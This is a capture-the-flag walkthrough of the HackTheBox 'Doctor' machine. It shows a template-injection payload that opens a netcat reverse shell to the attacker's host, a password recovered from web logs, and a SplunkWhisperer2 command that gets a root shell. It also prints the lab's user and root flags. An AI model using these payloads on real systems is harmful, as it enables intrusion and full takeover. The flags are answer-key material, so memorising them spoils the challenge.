Doctor Walkthrough | HackTheBox
| Name | Doctor |
|---|---|
| OS | Linux |
| Difficulty | Easy |
| Base Points | 20 |
| Release Date | 26 September 2020 |
| IP | 10.10.10.209 |
Information Gathering
Starting with NMap Scan.
sudo nmap -A 10.10.10.209
Results:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-18 00:42 EST Nmap scan report for 10.10.10.209 Host is up (0.26s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Doctor 8089/tcp open ssl/http Splunkd httpd | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2020-09-06T15:57:27 |_Not valid after: 2023-09-06T15:57:27 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 252.40 ms 10.10.14.1 2 252.41 ms 10.10.10.209 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 75.15 seconds
From the scan results, I found that there is a web server running at port 80 and Splunk Service is also running on port 8089.
In the webserver, I found an email-id 'info@doctors.htb' so I added 'doctors.htb' to my /etc/hosts. Then, I went back to the server and registered myself and logged in the portal.
The dashboard was empty, but there was an option to create a new message. I tried a couple of things but nothing worked, later I found that this Message Section is vulnerable to Server Side Template Injection.
I used the payloads from PayloadsAllTheThings
Getting the Shell
I found that the target is using Jinja2 template so a reverse shell can be spawned using the following script.
Note: The one from PayloadAllTheThings didn't worked for me.
<img src=http://10.10.14.24/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.24'$IFS'4321')>
On posting the above message, I got the reverse shell as "web". So I enumerated and escalated myself to user "shaun"
kali@kali:~$ nc -nlvp 4321 listening on [any] 4321 ... connect to [10.10.14.24] from (UNKNOWN) [10.10.10.209] 38596 whoami web groups web adm
The adm group relates to apache2, so I went to check the logs.
cat /var/log/apache2/access.log ... 10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" ... cat /etc/passwd ... shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
Username: shaun
Password: Guitar123
Let's login and grab the user flag.
su shaun Password: Guitar123 whoami shaun cat user.txt a85739cba9b98a8827889a5d82f1ab76
Privilege Escalation
From the NMap Results, I knew that Splunk Server is running so I googled about it and found a Privilege Escalation tool name SplunkWhisperer2
Run a netcat listener on your attack machine and execute the following command:
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.24 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/bash '10.10.14.24' '1234''
On netcat listener
kali@kali:~$ nc -lvp 1234 listening on [any] 1234 ... connected to [10.10.14.24] from (UNKNOWN) [10.10.10.209] 36622 whoami root cat /root/root.txt e473b6f7387f35236053fba164d97b90